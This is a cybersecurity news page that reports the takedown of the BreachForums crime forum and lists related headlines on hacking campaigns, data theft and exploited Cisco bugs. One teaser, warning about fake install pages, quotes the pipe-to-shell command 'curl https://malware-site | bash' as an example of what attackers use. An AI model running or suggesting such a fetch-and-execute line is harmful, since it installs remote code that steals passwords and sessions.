BreachForums, one of the most popular underground forums for sharing malware, stolen data, and more – was taken down. Now, the admin seems to be giving up and looking for someone to pass the torch to.
Over the weekend, the Cyber Counter-Intelligence Threat Investigation Consortium (CCITIC) posted on LinkedIn, saying that both the clearnet and Tor versions of BreachForums were displaying a 502 – Bad Gateway error. CCITIC is a non-profit which investigates cybersecurity threats and assists law enforcement in takedown efforts, and the organization said it managed to identify the upstream servers behind BreachForums, all hosted on DigitalOcean (ASN 14061) in the Frankfurt am Main datacenter.
Read more…
Source: TechRadar News
Sign up for the Cyber Security Review Newsletter
The latest cyber security news and insights delivered right to your inbox
Related:
- Salt Typhoon is hacking the world’s phone and internet giants
March 9, 2026
Salt Typhoon is behind one of the broadest hacking campaigns in recent years, targeting some of the world’s largest phone and internet companies and stealing tens of millions of phone records about senior government officials. The hacking group, attributed to China, is part of a wider cluster of hackers with the collective aim of helping China ...
- ShinyHunters claims more high-profile victims in latest Salesforce customers data heist
March 9, 2026
ShinyHunters told The Register that it has stolen data from about 100 high-profile companies in its latest Salesforce customer data heist, including Salesforce itself. “Have stolen data from almost 400 websites and about 100 essential high profile companies Snowflake, Okta, Lastpass, Salesforce itself, Sony, AMD, and a lot more,” a ShinyHunters spokesperson told us, adding ...
- Fake Claude Code install pages hit Windows and Mac users with infostealers
March 9, 2026
Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments. Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter. That habit turns the ...
- Russian cybercrims phish their way into officials’ Signal and WhatsApp accounts
March 9, 2026
Russian-linked hackers are trying to break into the Signal and WhatsApp accounts of government officials, journalists, and military personnel globally – not by cracking encryption, but by simply tricking people into handing over the keys. That’s the warning issued Monday by the Netherlands’ intelligence and military security agencies, the AIVD and MIVD, which say a “large-scale” ...
- Cisco warns of two more SD-WAN bugs under active attack
March 6, 2026
Just when network admins thought the Cisco SD-WAN patch queue might finally be shrinking, Switchzilla has confirmed miscreants are exploiting more vulnerabilities in its SD-WAN management software. The newly abused flaws affect Cisco Catalyst SD-WAN Manager, the platform formerly known as vManage that sits at the center of many organizations’ SD-WAN deployments. One of the bugs, ...
- Securing ambient AI in healthcare: governance is the new front line
March 5, 2026
Ambient AI is no longer experimental. It’s live. From AI-powered clinical documentation assistants to remote monitoring systems and intelligent patient engagement agents, healthcare organizations are embedding AI directly into care delivery. The promise is compelling: less administrative burden, faster insights, and more time with patients. But as AI enters clinical workflows, a more urgent question emerges: ...